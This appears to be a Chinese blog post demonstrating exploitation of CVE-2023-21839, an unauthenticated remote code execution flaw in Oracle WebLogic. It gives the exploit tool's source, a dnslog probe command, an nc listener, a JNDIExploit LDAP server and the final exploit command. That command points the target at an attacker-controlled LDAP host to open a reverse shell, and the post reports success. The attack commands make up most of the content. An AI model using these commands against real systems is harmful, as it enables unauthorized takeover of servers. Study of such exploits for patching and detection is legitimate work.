CVE-2023-21839 Weblogic未授权RCE

https://github.com/4ra1n/CVE-2023-21839下载之后
在这里插入图片描述
生成CVE-2023-21389.exe
先试试dnslog:

CVE-2023-21839.exe -ip 116.xx.xx.xx -port 7001 -ldap ldap://whoami.eduvck.dnslog.cn/aa

在这里插入图片描述

然后使用JNDIExploit-1.4-SNAPSHOT.jar进行攻击
另一个终端上
首先开启监听

nc -lvp 5858

在这里插入图片描述
然后用JNDIExploit-1.4-SNAPSHOT.jar监听jndi端口
在这里插入图片描述

然后执行exp

CVE-2023-21839.exe -ip 116.xx.xx.xx -port 7001 -ldap ldap://47.xx.xx.xx:1389/Basic/ReverseShell/47.xx.xx.xx/5858

在这里插入图片描述
在这里插入图片描述
这样就成功弹回了shell

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值